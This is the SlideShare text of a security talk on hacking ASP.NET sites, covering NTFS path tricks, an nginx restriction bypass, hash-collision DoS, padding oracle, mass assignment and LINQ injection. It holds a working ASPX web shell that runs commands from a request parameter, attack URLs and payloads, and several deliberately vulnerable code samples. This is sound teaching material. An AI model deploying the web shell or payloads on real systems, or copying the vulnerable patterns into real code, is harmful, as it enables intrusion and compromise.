SlideShare a Scribd company logo
1 of 30
TO HACK AN ASP .NET WEBSITE?
HARD, BUT POSSIBLE!
Vladimir Kochetkov
Positive Technologies
A Blast From The Past: File System
DOS devices and reserved names:
NUL:, CON:, AUX:, PRN:, COM[1-9]:, LPT[1-9]: - the colon is
optional, names can be used as part of the path
Reserved characters:
< > : "  / | ? *
Case insensitivity of names:
Filename == FileName == filename == FILENAME
Support for short names 8.3:
LongFileName.Extension ~= LONGFI~1.EXT ~= LO0135~1.EXT
Ending characters:
Filename == Filename... == Filename
A Blast From The Past: File System
Named pipe and mailslots (CreateFile):
Hostpipe<name> , Hostmailslot<name>
Alternative syntax of relative paths:
C:Windowsnotepad.exe == C:notepad.exe , if Windows is a
current catalog of C:
Substitutions (FindFirstFile):
< == * , > == ? , " == .
UNC and Unicode paths:
C:WindowsSystem32
HostC$WindowsSystem32
.C:WindowsSystem32
?C:WindowsSystem32
?UNCHostC$WindowsSystem32
A Blast From The Past: File System
Meta attributes and NTFS alternative data streams:
Directory:<Name>:<Type>File:<Name>:<Type>
C:Windowshh.exe == C:Windows:$I30:$INDEX_ALLOCATIONhh.exe
C:Windowsnotepad.exe == C:Windowsnotepad.exe::$DATA
FileName.aspx == FileName.aspx:.jpg
Files Meta Attributes Indices Meta Attributes
$STANDARD_INFORMATION $INDEX_ROOT
$FILE_NAME $INDEX_ALLOCATION
$DATA $BITMAP
$ATTRIBUTE_LIST
$OBJECT_ID
$REPARSE_POINT
[PT-2012-06] Nginx Restrictions Bypass
Severity level: Medium (5.0)
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
Vulnerable versions: Nginx for Windows <= v1.3
Vector: Remote
The flaw enables an intruder to forward HTTP requests to certain URL addresses,
bypassing the rules set in the Location directives of the web server configuration.
By exploiting the vulnerability, a potential hacker could gain access to the
application source code and closed parts of the website, detect new vulnerabilities,
steal passwords to the database or other services, etc.
:$I30:$INDEX_ALLOCATION
were processed as a part of the catalog name.
[PT-2012-06] Nginx Restrictions Bypass
http://hostname/.svn/entries
http://hostname/.svn::$INDEX_ALLOCATION/entries
HTTP/1.1 200 OK
Server: nginx/1.2.0
HTTP/1.1 403 Forbidden
Server: nginx/1.2.0
* A stable version of nginx-1.2.0 for Windows, released 2012-04-23
…
location ~/.svn/ {
deny all;
}
…
.NET Platform Architecture
Memory Corruption
Interaction with native libraries, use of mix assemblies
MS12-025, April 2012: - arbitrary code execution is triggered
by exploitation of an integer overflow vulnerability in gdiplus.dll
which causes heap corruption when calling the constructor of the
System.Drawing.Imaging.EncoderParameter class.
Insecure managed code
unsafe void bufferOverflow(string s)
{
char* ptr = stackalloc char[10];
foreach (var c in s)
{
*ptr++ = c
}
}
Turkish I And Other Peculiarities
If two strings are compared with no regard to the current regional
settings, the result might be quite unexpected:
The English language: I & i
The Turkish language: I & ı + İ & i
<%@ Page Language="C#" Culture="Auto" %>
<%@ Import Namespace="System.Globalization" %>
<! DOCTYPE html>
…
<script runat="server">
…
if (Session["mode"].ToLower() != "admin")
…
if (String.Compare(Request["path"]), 0,
"FILE:", 0, 5, true)
…
Collision of Object Hashes
System.Object.GetHashCode() returns a 32 bit hash code of an object (takes on
values within the range from -2147483648 to 2147483647).
(http://blogs.msdn.com/b/ericlippert/archive/2010/03/22/socks-birthdays-and-hash-collisions.aspx)
Collision in ASP .NET (MS11-100)
Standard situation: Unusual situation:
3QBZJK5ZX=&NEUQ7BWAV6=&6902D0YP6J=&9PZGHCDJYD=&NU73S3KNV=&IF686YJQJ8K=&9XUUCJEENJ=&F
X4A75F91FM=&IGJKQVBZAVK=&LJVJV6J3UZ=&X7GJ5MWXY=&6AVIZWTVK=&WQNIQ7OZMS=&IM1VKMZHK6F=&
DO9WX2R9H=&RYLZSIQT8V=&KR9BBFUH2E=&UI8N4SWVWW=&TL5F6URVPP=&B1P81FWDSVV=&CM6Y80XSAO=&
LE72GBPWB=&EEFMULEXC=&M6FKM13WB=&MGN8123XA2K=&ZMI35GXHMN=&LXQQOM138LL=&XXST36DRX=&JR
YRV54TFZ=&LGG3X9MFN7=&MH1NI402I22=&MHFIKIM0TEH=&BWPRVCQ4X3=&RM6K7V75WZ=&SMIAE6PAL4=&
MOCGW14ZU7=&I0JKKKOG7EN=&Q4B9V7L3VZ=&23UAYU5B31=&9TRJE0XRWQ=&3Q3LKPC2K0=&D3ACY8973E=
=&VGJPMCQHP=&AV6THWSCA7=&MH5SM8NPWB1=&P57KEP668X=&81C4LQ4DFY=&MPJBASYMRM=&25EWGNN5NE
… over 4Mb form data …
(https://github.com/HybrisDisaster/aspHashDoS)
A Tricky Plan (Post-Mortem MS11-100)
1. Create 1000 collision strings
for each combination ‘.NET
version’/’hardware platform’
2. Send each combination as
POST request parameters
3. Measure the response time
for each request
4. ???
5. ;)
.NET Web stack
ASP.NET / MVC
ASP.NET Peculiarities
Special catalogs and files:
- App_Browser –browsers definition (*.browsers)
- App_Code – a source code of helper classes and
logics
- App_Data – data stores
- App_GlobalResources, App_LocalResources –
application resources (*.resx, *.resources)
- App_Themes – topics (*.skin, *.css, images, etc);
- App_WebReferences – links to web services
(*.wsdl, *.xsd, *.disco, *.discomap)
- Bin – compiled builds used by the application
- web.config, web.*.config – configuration files that determine settings of the
web server and application
ASP .NET Peculiarities
Standard HTTP handlers:
- WebResource.axd – access to the static resources embedded in the application
assemblies.
- ScriptResource.axd – access to JavaScripts embedded in the assemblies or stored on
the disk.
Usage:
http://hostname/*Resource.axd?d=<resourceId>&t=<timestamp>
Example:
http://hostname/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP
8mXnNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3-
kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1
where ‘d’ is an encrypted parameters:
Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c3
8a3a9b
Padding Oracle (MS10-070)
Consequences:
– getting encryption/decryption keys:
 authentication cookies
 ViewState and Event Validation
 Arguments for WebRecource.axd and ScriptResource.axd =>
Reading arbitrary files inside the application catalog
Corrections:
 Padding error returns a generic error message
 A random number is used as IV
 The format of encrypted strings is changed for their validation
 ScriptResource.axd can handle only *.js files
ASP .NET Features
Standard HTTP handlers:
- Trace.axd request tracing (available only in the debugging mode)
Features of LFI exploitation
Response.WriteFile(<vfilename>)
- Allows including any file, except *.config, inside the application catalog
- The file is included statically without code execution
- Accepts virtual file name as an argument
Server.Execute(<vfilename>)
- Allows including any file, except for *.config, into the application catalog
- Calls a handler for the sent file, includes the result into the response
- Accepts virtual file name as an argument
File.ReadAllText(<filename>)
- Allows including any file if obtains enough privileges
- The file is included statically without code execution
- Accepts file name as an argument
Minimum C# Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
new ProcessStartInfo(
"cmd","/c " + Request["c"]
)
{
UseShellExecute = false,
RedirectStandardOutput = true
}
).StandardOutput.ReadToEnd()
%>
ViewState
Meant to transfer data on view
element to the server.
- Is transferred in the __VIEWSTATE
parameter
- Encryption and integrity are not
ensured in many cases
- Is used by developers for session
data storage on the client, though is
not meant for this
- Violation of its integrity can trigger
exploitation of various threats from
XXS to violation of application’s
functionality.
Request and Event Validations
Request Validation is an embedded simple WAF aimed at preventing XSS. Blocks
all requests that contain:
&#
< followed by a letter, !, / and ?
Besides, it skips extraneous parameters started with с __
Event Validation is an embedded mechanism of
event data validation. It is a __EVENTVALIDATION
parameter that stores hashes of acceptable elements of of
forms, events, ViewState, etc.
Contrary to the common belief,
it is insufficient against CSRF attacks
as a standard implementation instance.
Mass Assignment
public class User
{
public int Id
{ get; set; }
public string UserName
{ get; set; }
public string Password
{ get; set; }
public bool IsAdmin
{ get; set; }
}
public class UserController : Controller
{
IUserRepository _userRepository;
public UserController(IUserRepository userRepository) {
_userRepository = userRepository;
}
public ActionResult Edit(int id) {
var user = _userRepository.GetUserById(id);
return View(user);
}
[HttpPost]
public ActionResult Edit(int id, FormCollection collection) {
try {
var user = _userRepository.GetUserById(id);
UpdateModel(user);
_userRepository.SaveUser(user);
return RedirectToAction("Index");
} catch {
return View();
}
}
}
Model: Controller:
Mass Assignment
(http://digitalbush.com/2012/03/05/mass-assignment-aspnet-mvc/)
LINQ Injection
LINQ is a query language embedded into the syntax of the .NET languages.
var result = from item in itemsList
where item.field1 % 2 == 0
orderby item.field2 descending
select new { item.field2, item.field3 };
var result = itemsList
.Where(x => x.field1 % 2 == 0)
.Select(x => new { x.field2, x.field3 })
.OrderByDescending(x => x.field2);
Expression.Lambda<Predicate<int>>(
Expression.Equal(
Expression.Modulo(
parameterN,
Expression.Constant(2)
),
Expression.Constant(0)
),
parameterN);
LINQ Injection
Dynamic LINQ is one of a few libraries used to create dynamic run-
time LINQ requests.
Features:
- Definition of expressions by strings;
- Basic simple operations
- Access to members of static and
instant data types
- Type instantiation and
anonymous types construction
What if "modifier" is formed out of input
data and contains
0 OR 1 == 1 ?
var modifier = "0";
var result = itemsList
.Where("field1 % 2 == " + modifier)
.Select(x => new { x.field2, x.field3 })
.OrderByDescending(x => x.field2);
LINQ Injection
Injection’s limitations in Dynamic LINQ:
- Access to fields, properties and methods is available only for a collection type or
for accessible types specified in the ‘white list’
- All expression parts must be executed without errors; error messages do not
contain useful output
- Injection is performable only for isolated parts of requests
Injection’s possibilities in Dynamic LINQ:
- Authentication / authorization bypass
- Unauthorized access to the collection data
- Abuse of functionality (provided that the collection objects have the statefull
fields)
- Conduction of DoS attacks (DoS).
Remote Code Execution is actual in other solutions
NorthWind DEMO
public AjaxStoreResult GetCustomers(int limit, int start, string dir, string sort)
{
var query = (from c in this.DBContext.Customers
select new
{
c.CustomerID,
c.CompanyName,
c.ContactName,
c.Phone,
c.Fax,
c.Region
}).OrderBy(string.Concat(sort, " ", dir));
int total = query.ToList().Count;
query = query.Skip(start).Take(limit);
return new AjaxStoreResult(query, total);
}
NorthWind DEMO
Demo
Thank You for Your
Attention!
Questions?
vkohetkov@ptsecurity.ru
twitter: @kochetkov_v

More Related Content

What's hot

Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
Jpa 잘 (하는 척) 하기
Jpa 잘 (하는 척) 하기Jpa 잘 (하는 척) 하기
Jpa 잘 (하는 척) 하기경원 이
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
non-strict functions, bottom and scala by-name parameters
non-strict functions, bottom and scala by-name parametersnon-strict functions, bottom and scala by-name parameters
non-strict functions, bottom and scala by-name parametersPhilip Schwarz
 

What's hot (20)

Sql injection
Sql injectionSql injection
Sql injection
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applications
 
Jpa 잘 (하는 척) 하기
Jpa 잘 (하는 척) 하기Jpa 잘 (하는 척) 하기
Jpa 잘 (하는 척) 하기
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORS
 
JSON Injection
JSON InjectionJSON Injection
JSON Injection
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
non-strict functions, bottom and scala by-name parameters
non-strict functions, bottom and scala by-name parametersnon-strict functions, bottom and scala by-name parameters
non-strict functions, bottom and scala by-name parameters
 

Viewers also liked

Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsSarvesh Kushwaha
 
AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)Marco Balduzzi
 
чынгыз айтматов Small
чынгыз айтматов Smallчынгыз айтматов Small
чынгыз айтматов SmallKamchibekova Rakia
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02ragibhasan
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateEnterprise Softworx Solutions
 
Abusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User ProfilingAbusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User ProfilingMarco Balduzzi
 
ОО" Шоола Кол" презентация Результаты поиска Санкт-Петербург 14 октября
ОО" Шоола Кол" презентация  Результаты поиска Санкт-Петербург  14 октябряОО" Шоола Кол" презентация  Результаты поиска Санкт-Петербург  14 октября
ОО" Шоола Кол" презентация Результаты поиска Санкт-Петербург 14 октябряАсылбек Айтматов
 
Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...Venkatesh Prabhu
 
TUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMTUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMika aprilia
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in CloudSanoj Kumar
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
 HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime InvestigationsMarco Balduzzi
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...Marco Balduzzi
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyMariangeles Rivera
 

Viewers also liked (20)

Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
 
AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)
AIS Exposed. New vulnerabilities and attacks. (HITB AMS 2014)
 
Family tree
Family treeFamily tree
Family tree
 
чынгыз айтматов Small
чынгыз айтматов Smallчынгыз айтматов Small
чынгыз айтматов Small
 
Pentru tine
Pentru tinePentru tine
Pentru tine
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation Template
 
Why AIS is not always enough
Why AIS is not always enoughWhy AIS is not always enough
Why AIS is not always enough
 
Abusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User ProfilingAbusing Social Networks for Automated User Profiling
Abusing Social Networks for Automated User Profiling
 
Presentation1
Presentation1Presentation1
Presentation1
 
ОО" Шоола Кол" презентация Результаты поиска Санкт-Петербург 14 октября
ОО" Шоола Кол" презентация  Результаты поиска Санкт-Петербург  14 октябряОО" Шоола Кол" презентация  Результаты поиска Санкт-Петербург  14 октября
ОО" Шоола Кол" презентация Результаты поиска Санкт-Петербург 14 октября
 
Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...Cloud computing security policy framework for mitigating denial of service at...
Cloud computing security policy framework for mitigating denial of service at...
 
Adauga un text
Adauga un textAdauga un text
Adauga un text
 
Personal informatic
Personal informaticPersonal informatic
Personal informatic
 
TUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMTUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEM
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in Cloud
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
 HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
 

Similar to Hack an ASP .NET website? Hard, but possible!

C++17 std::filesystem - Overview
C++17 std::filesystem - OverviewC++17 std::filesystem - Overview
C++17 std::filesystem - OverviewBartlomiej Filipek
 
How Secure Are Docker Containers?
How Secure Are Docker Containers?How Secure Are Docker Containers?
How Secure Are Docker Containers?Ben Hall
 
Troubleshooting PostgreSQL Streaming Replication
Troubleshooting PostgreSQL Streaming ReplicationTroubleshooting PostgreSQL Streaming Replication
Troubleshooting PostgreSQL Streaming ReplicationAlexey Lesovsky
 
Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...
Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...
Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...Data Con LA
 
GHC Participant Training
GHC Participant TrainingGHC Participant Training
GHC Participant TrainingAidIQ
 
maxbox starter72 multilanguage coding
maxbox starter72 multilanguage codingmaxbox starter72 multilanguage coding
maxbox starter72 multilanguage codingMax Kleiner
 
Easy deployment & management of cloud apps
Easy deployment & management of cloud appsEasy deployment & management of cloud apps
Easy deployment & management of cloud appsDavid Cunningham
 
finalprojtemplatev5finalprojtemplate.gitignore# Ignore the b
finalprojtemplatev5finalprojtemplate.gitignore# Ignore the bfinalprojtemplatev5finalprojtemplate.gitignore# Ignore the b
finalprojtemplatev5finalprojtemplate.gitignore# Ignore the bChereCheek752
 
Deep Dumpster Diving
Deep Dumpster DivingDeep Dumpster Diving
Deep Dumpster DivingRonnBlack
 
Oleksandr Valetskyy - DI vs. IoC
Oleksandr Valetskyy - DI vs. IoCOleksandr Valetskyy - DI vs. IoC
Oleksandr Valetskyy - DI vs. IoCOleksandr Valetskyy
 
Clean code _v2003
 Clean code _v2003 Clean code _v2003
Clean code _v2003R696
 
Symfony2 - from the trenches
Symfony2 - from the trenchesSymfony2 - from the trenches
Symfony2 - from the trenchesLukas Smith
 

Similar to Hack an ASP .NET website? Hard, but possible! (20)

TO Hack an ASP .NET website?
TO Hack an ASP .NET website?  TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
CGI.ppt
CGI.pptCGI.ppt
CGI.ppt
 
srgoc
srgocsrgoc
srgoc
 
Srgoc dotnet
Srgoc dotnetSrgoc dotnet
Srgoc dotnet
 
C++17 std::filesystem - Overview
C++17 std::filesystem - OverviewC++17 std::filesystem - Overview
C++17 std::filesystem - Overview
 
How Secure Are Docker Containers?
How Secure Are Docker Containers?How Secure Are Docker Containers?
How Secure Are Docker Containers?
 
Book
BookBook
Book
 
Troubleshooting PostgreSQL Streaming Replication
Troubleshooting PostgreSQL Streaming ReplicationTroubleshooting PostgreSQL Streaming Replication
Troubleshooting PostgreSQL Streaming Replication
 
Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...
Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...
Big Data Day LA 2015 - Compiling DSLs for Diverse Execution Environments by Z...
 
GHC Participant Training
GHC Participant TrainingGHC Participant Training
GHC Participant Training
 
maxbox starter72 multilanguage coding
maxbox starter72 multilanguage codingmaxbox starter72 multilanguage coding
maxbox starter72 multilanguage coding
 
Having Fun with Play
Having Fun with PlayHaving Fun with Play
Having Fun with Play
 
Easy deployment & management of cloud apps
Easy deployment & management of cloud appsEasy deployment & management of cloud apps
Easy deployment & management of cloud apps
 
Os lab final
Os lab finalOs lab final
Os lab final
 
finalprojtemplatev5finalprojtemplate.gitignore# Ignore the b
finalprojtemplatev5finalprojtemplate.gitignore# Ignore the bfinalprojtemplatev5finalprojtemplate.gitignore# Ignore the b
finalprojtemplatev5finalprojtemplate.gitignore# Ignore the b
 
Deep Dumpster Diving
Deep Dumpster DivingDeep Dumpster Diving
Deep Dumpster Diving
 
Oleksandr Valetskyy - DI vs. IoC
Oleksandr Valetskyy - DI vs. IoCOleksandr Valetskyy - DI vs. IoC
Oleksandr Valetskyy - DI vs. IoC
 
Clean code _v2003
 Clean code _v2003 Clean code _v2003
Clean code _v2003
 
Symfony2 - from the trenches
Symfony2 - from the trenchesSymfony2 - from the trenches
Symfony2 - from the trenches
 

More from Vladimir Kochetkov

Практическое использование средств криптографии в .NET, Java и PHP
Практическое использование средств криптографии в .NET, Java и PHPПрактическое использование средств криптографии в .NET, Java и PHP
Практическое использование средств криптографии в .NET, Java и PHPVladimir Kochetkov
 
Do WAFs dream of static analyzers
Do WAFs dream of static analyzersDo WAFs dream of static analyzers
Do WAFs dream of static analyzersVladimir Kochetkov
 
AppSec -- хакерский путь
AppSec -- хакерский путьAppSec -- хакерский путь
AppSec -- хакерский путьVladimir Kochetkov
 
Подводные камни прикладной криптографии, I
Подводные камни прикладной криптографии, IПодводные камни прикладной криптографии, I
Подводные камни прикладной криптографии, IVladimir Kochetkov
 
Философия Application Security
Философия Application SecurityФилософия Application Security
Философия Application SecurityVladimir Kochetkov
 
Современные подходы к SAST
Современные подходы к SASTСовременные подходы к SAST
Современные подходы к SASTVladimir Kochetkov
 
Подводные камни System.Security.Cryptography
Подводные камни System.Security.CryptographyПодводные камни System.Security.Cryptography
Подводные камни System.Security.CryptographyVladimir Kochetkov
 
Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Взломать Web-сайт на ASP.NET? Сложно, но можно!
Взломать Web-сайт на ASP.NET? Сложно, но можно!Vladimir Kochetkov
 
Прикладная теория Application Security
Прикладная теория Application SecurityПрикладная теория Application Security
Прикладная теория Application SecurityVladimir Kochetkov
 
Automated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeAutomated Patching for Vulnerable Source Code
Automated Patching for Vulnerable Source CodeVladimir Kochetkov
 
Исключительно простая теория AppSec .NET
Исключительно простая теория AppSec .NETИсключительно простая теория AppSec .NET
Исключительно простая теория AppSec .NETVladimir Kochetkov
 
Автоматическая генерация патчей для уязвимого исходного кода
Автоматическая генерация патчей для уязвимого исходного кодаАвтоматическая генерация патчей для уязвимого исходного кода
Автоматическая генерация патчей для уязвимого исходного кодаVladimir Kochetkov
 
How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)
How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)
How to Develop a Secure Web Application and Stay in Mind? (PHDays 3)Vladimir Kochetkov
 
Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)
Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)
Как разработать защищенное веб-приложение и не сойти при этом с ума (вебинар)Vladimir Kochetkov
 
Как разработать защищенное веб-приложение и не сойти при этом с ума? (PHDays 3)
